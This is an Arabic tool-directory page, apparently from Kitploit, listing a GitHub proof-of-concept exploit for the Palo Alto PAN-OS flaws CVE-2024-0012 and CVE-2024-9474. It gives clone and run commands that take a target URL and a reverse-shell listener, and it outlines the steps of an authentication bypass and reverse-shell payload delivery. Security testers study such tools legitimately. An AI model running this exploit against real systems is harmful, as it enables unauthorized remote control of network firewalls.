Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-0012_CVE-2024-9474_PoC — يستهدف هذا الدليل (PoC) الثغرات الأمنية في نظام Palo Alto PAN-OS، وتحديداً CVE-2024-0012 و CVE-2024-9474. تقوم هذه الأداة بأتمتة عملية الاستغلال، بما في ذلك إنشاء الحمولة (payload)، والتسليم المجزأ (chunked delivery)، وتنفيذ الأوامر بسلاسة. | Kitploit
أدوات/GitHubGitHub/talatumlabs/cve-2024-0012_cve-2024-9474_poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubtalatumlabs/cve-2024-0012_cve-2024-9474_poc

CVE-2024-0012_CVE-2024-9474_PoC

يستهدف هذا الدليل (PoC) الثغرات الأمنية في نظام Palo Alto PAN-OS، وتحديداً CVE-2024-0012 و CVE-2024-9474. تقوم هذه الأداة بأتمتة عملية الاستغلال، بما في ذلك إنشاء الحمولة (payload)، والتسليم المجزأ (chunked delivery)، وتنفيذ الأوامر بسلاسة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
85منذ سنة واحدةلم تتم المراجعة بعد

🚀 CVE-2024-0012 & CVE-2024-9474 (Palo Alto PAN-OS) ثغرة استغلال 🔐

Palo Alto PAN-OS نوع الاستغلال

🛡️ الوصف

هذا النص البرمجي التجريبي (PoC) يستهدف الثغرات الأمنية في نظام Palo Alto PAN-OS، وتحديداً CVE-2024-0012 و CVE-2024-9474، من خلال أتمتة عملية الاستغلال، بما في ذلك تجاوز المصادقة، وإنشاء الحمولة، والتوصيل المجزأ، وتنفيذ الأوامر بسلاسة.

⚠️ هذا النص البرمجي مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به غير قانوني.


🔍 الثغرات التي يتم معالجتها

CVE-2024-0012

  • النوع: تجاوز المصادقة
  • التأثير: يتيح الوصول غير المصرح به إلى واجهات الإدارة.
  • الخطورة: 🚨 حرجة

CVE-2024-9474

  • النوع: تنفيذ أوامر وتصعيد الامتيازات
  • التأثير: يسمح للمهاجمين عن بعد بتنفيذ أوامر تعسفية.
  • الخطورة: 🔥 متوسطة

🧑‍💻 الاستخدام

🛠️ استنساخ المستودع

root@kitploit:~
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC

🚀 تشغيل النص البرمجي

root@kitploit:~
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

الوسائط:

  • <TARGET_URL>: عنوان URL الهدف، بما في ذلك http أو https.
  • <LISTENER_IP>: عنوان IP الخاص بك لمستمع الصدفة العكسية.
  • <LISTENER_PORT>: المنفذ لمستمع الصدفة العكسية.

💡 مثال

root@kitploit:~
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444

💻 عرض الاستغلال

https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5


⚙️ آلية العمل

احصل على التحليل الكامل والرؤى التقنية حول هذا الاستغلال التجريبي من خلال هذا المقال على Medium!

  1. 🔍 التحقق من الثغرة: التأكد من أن الهدف عرضة لـ CVE-2024-0012 و CVE-2024-9474.
  2. 🛡️ استخراج PHPSESSID: الحصول على معرف جلسة لمواصلة الاستغلال.
  3. ✨ إنشاء الحمولة: إنشاء حمولة صدفة عكسية مشفرة مرتين.
  4. 📦 رفع الأجزاء: إرسال أجزاء الحمولة إلى الخادم الهدف.
  5. 🔗 دمج الحمولة: إعادة بناء الحمولة على النظام الهدف.
  6. ⚡ تنفيذ الأمر: فك تشفير وتنفيذ الصدفة العكسية.

⚠️ إخلاء مسؤولية قانوني

هذا الاستغلال التجريبي مخصص للأغراض التعليمية واختبار الأمن المصرح به فقط. الاستخدام غير المصرح به لهذه الأداة محظور تمامًا. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


🧑‍🎓 المؤلف

ghostxploiter

تنزيل الأداة